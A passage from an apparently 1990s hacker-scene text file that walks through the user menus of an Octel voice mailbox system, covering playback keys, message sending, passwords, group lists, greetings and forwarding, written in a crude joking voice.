      has a mailbox on that system or whether it came from an outside
      caller. It will tell you the date & time sent, how long it is and if
      the message is marked as private, urgent or both.
   6: Send a copy. Press 6 and then you will be prompted to make a recording
      of comments for the message so that the person the message is being
      forwarded to knows that it is a forwarded message from you. After
      recording the comments press #. If you would like to review your
      comments press 1. Now you enter the mailbox or, if you don't know
      that, press # to dial by name.
   7: Erase. Just what it says. It erases the message after you listen to
      the message.
   8: Reply.
      After you press 8, record your reply, then press # to tell the system
      you are done recording, and then press # again to send. You can use
      record/edit controls during your reply. These will be covered later in
      the text.
   9: Save. Just as it says. This option archives your messages.
   #: Skip a message. While you are listening to the new messages you can
      press # to skip them, but after you listen to the new messages it
      plays your skipped messages over and then your archived messages.
  ##: Skip to archived messages. If you are listening to the new messages
      and you want to skip to the archived messages just hit ## and you will
      be taken to them.
   *: Cancel review of messages. This option cancels message review and
      takes you back to the main menu.

Commands used during playback of messages
-----------------------------------------
   1: Rewinds message 10 seconds.
  11: Rewinds to the beginning of the message.
   2: Pause. To unpause press 2 again.
   3: Fast-forwards message 10 seconds.
  33: Fast-forwards to the end of the message.
   4: Plays the message slower.
   5: Gives envelope information.
   6: Plays the message faster.
   8: Levels volume to normal level.
   9: Increases volume.

#2. Sending messages to other subscribers on the system
-------------------------------------------------------
This function of the vmb is quite useful to the actual users of the system.
Once someone has received their messages and read them etc., they can then
send a message to some other person on that same system without having to
dial their front door. Here are the options that are used during the
recording and after the recording of the message.

   #: Stop recording once you are satisfied with the message.
   1: Replay your message.
   *: Re-record your message if you are not satisfied with it. When
      re-recording you can re-record the whole message or just part of it.
      Use the Recording controls which will be listed later on in the text.

(NOTE: If you are leaving a long message the system will notify you with two
beeps that tell you your time is almost up.)

Once you have finished recording your message you have the choice of
re-recording the message or delivering it. There are several ways of
selecting a destination.

   1) box number.
   2) subscriber's name.
   3) group or personal distribution list.
   4) a guest or home mailbox number.

(NOTE: Later on in the text we will discuss how to create distribution lists
and guest and home mailboxes.)

When you are going to give the name of the person, instead of the mailbox
number, here is the format for entering in the name -- last, first.

   0 = 0
   1 = 1
   2 = 2, a, b, or c
   3 = 3, d, e, or f
   4 = 4, g, h, or i
   5 = 5, j, k, or l
   6 = 6, m, n, or o
   7 = 7, p, q, r, or s
   8 = 8, t, u, or v
   9 = 9, w, x, y, or z

For instance, if I was on the same system as you, you could send it to
PiMP,Telco = 746783526

You can mark the messages as either urgent or private. After you enter the
destination and before you send the message is when you can mark the message.
You can always cancel the option by pressing the option number a second
time.

   1: Private.
   2: Urgent.

If you select message confirmation you will be presented with two choices:
confirmation of receipt and notification of non-receipt. Confirmation of
receipt is a system generated message which is sent to you after the person
has read your message. Notification of non-receipt is a system generated
message that tells you that the subscriber has not listened to your message
within a certain time frame.

   1: Confirmation of receipt.
   2: Notification of non-receipt.

If you wanted to, you could give the system a certain time to deliver the
message. This function is known as Future Delivery.

   4: Future delivery. After selecting this option you will be prompted to
      enter a date. You can either enter the actual date or, if the message
      is to be delivered within the week, you can specify the day of the
      week.
      1: Specify the date.
         -Select the month. Jan.= 1 and Sept.= 9.
         -Select the date.
          Between 1 and 31.
         -Set the hour and minutes. 7:00 = 700 and 12:30 = 1230.
         -Select 1 for a.m. or 2 for p.m.
      2: Specify the day of the week.
         -Enter the first two letters of the day, using the chart above that
          was used to enter in the name of the person on the system.
          Sun.= 78 and Fri.= 37.
         -Select the hour and minutes using the same format above.
         -Select the time of day, a.m. or p.m., using the format above.

After selecting all of the options and getting everything squared away, you
are now ready to send the message. Press # to do this. After this enter * to
go back to the main menu.

Recording controls
------------------
Recording controls are basically identical to playback controls used while
listening to messages. There are only a few commands that are different.

   5: Resume the recording of a message.
   1: Edit message.
  11: Listen to what has been recorded.
   2: Pause. Then press 5 to re-record over the undesired part of the
      message.

#3. Check Receipt
-----------------
After you have entered this section from the main menu by pressing 3 you will
be asked to identify the subscriber's mailbox number or enter in their name.
All this option does is tell you whether or not the person you sent mail to
has listened to your mail. If they have not listened to your mail all the
way you will not get the receipt. The system will play back every message the
subscriber has not listened to. To skip the messages you can press #, or
press * to cancel the Check Receipt.

#4. Personal Options
--------------------
Under this section in the main menu there are 6 options you can choose from:
1) Notification On/Off. 2) Administrative options. 3) Greetings.
4) Notification schedule. 5) Mailbox forwarding. & 6) Security Options.
(g00d13) There are many levels of menus to this part of the main menu. But
don't worry, Jane Octel will talk you through all of the steps...:)

   1: Notification On/Off. This option basically sets whether system messages
      are repeated or not. 1 = On, 2 = Off.
   2: Administrative options. (Under this level you have many many choices)
      1: Passwords.
         1: Personal Password. Your personal password can be up to 15 digits
            long. Your sysadmin sets the minimum length required. Do not
            forget your password because then the sysadmin is forced to kill
            that mailbox and start you up a new one. The sysadmin will not be
            a happy camper. But then again sysadmins can eat a dick right?
         2: Home Password. This is just some password you can give to
            members in your family. This just lets them send and receive
            mail like a guest.
       3&4: Guest Password. This is one of the coolest options of all. This
            is basically a mailbox within a mailbox. You designate a
            password to one of your friends and he can leave messages to you
            and you can leave messages to him. But other users on the system
            cannot send the guest mail.
         5: Security Password. This allows someone the option of getting the
            envelope information for the messages in your mailbox.
      2: Group Lists (NOTE: You can have a maximum of 15 lists with a maximum
         of 25 mailboxes).
         1: Create list.
            -Give a two digit number for the list you want to create (from
             11 to 25).
            -Record the name for the list like "Uhh cool asswipes".
            -Enter either the mailbox number or the name of the people you
             want on the list.
            -To review all the names on the list press 1.
            -To exit and save the list press *.
            When you want to send a message to a distribution list, enter in
            the list number when you are prompted to enter in the destination
            after recording the message etc.
         2: Edit existing lists.
         3: Delete existing lists.
         4: Review or rename lists.
      3: Prompt levels. These are the message prompts. It is like setting up
         menus on a bbs. You can choose novice, skilled, expert. This is not
         unlike setting up menus to your liking.
         1: Standard prompts. These prompts are your basic prompts which go
            over basic options such as sending mail etc.
         2: Extended prompts.
            This prompt gives thorough explanations of commands and prompts
            you for use of all features.
         3: Rapid prompts. These prompts cover all features but do not give
            thorough details and explanations.
      4: Date and Time playback. This option tells you the time the message
         was received. You can turn this on by hitting 1 for on or 2 for off.
   3: Greetings.
      1: Personal greeting. This is the greeting you get once you have called
         up the front door or you have been transferred to that vmb. It is
         basically the same for almost all vmbs. You enter in a message like
         "Uhh this is Da TelcoPiMP, leave a fucking message after the
         beep!!" You can also choose a standard greeting which is the Jane
         Octel voice saying that so and so is not in right now.
      2: Extended absence greeting. This greeting just says that you are out
         for a lengthy period of time and won't be checking messages
         frequently. If the Message block option is on when the extended
         absence greeting is on, your mailbox will not accept messages
         except for messages from the sysadmin.
      3: Name recording. This is a recording of your name which is used to
         confirm mailboxes when someone has entered in the number of your
         mailbox. It is also used with the standard greeting.
   4: Notification schedule. This function allows your mailbox to call you at
      certain times (the times you set up) to give you messages.
      -Select 1 for first schedule, 2 for second schedule or 3 for temporary
       schedule.
      -Enter the telephone number you want the system to call you at.
      -You will be asked to set up a start/stop time for the outcall
       notification from your mailbox. You can specify whether it applies to
       weekdays, weekends or both. Enter in the time using the same format
       as the earlier commands that require you to enter in the time.
      -Select the type of message that activates the notification. 1 = All,
       2 = Urgent and 3 = Group List.
      -Select how soon you want the system to call you after it receives a
       new message.
       1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 = immediately and
       6 = Never.
      -After all of this hassle you can confirm your entries or listen
       again. 1 = Confirm and 2 = Listen again.
   5: Mailbox forwarding. (NOTE: To have this option work you must have
      another mailbox created by the sysadmin, for the forwarded messages.
      Call up the system where the mailbox has been created for you and set
      it up.)
      1: Establish or change the forwarding destination. Enter the network
         node address? and the forwarding destination mailbox number.
      2: Cancel mailbox forwarding.
      #: Confirmation.
   6: Security options. (huhuhuhuh k00l)
      1: Turn on access sekurity. (Record your name and the time.)
      2: Turn off access sekurity.
      Ok a little inpho on this option. Once access security is on you are
      asked to record your name and time. This is so that the next time you
      login to your vmb you will hear "The last mailbox access was by at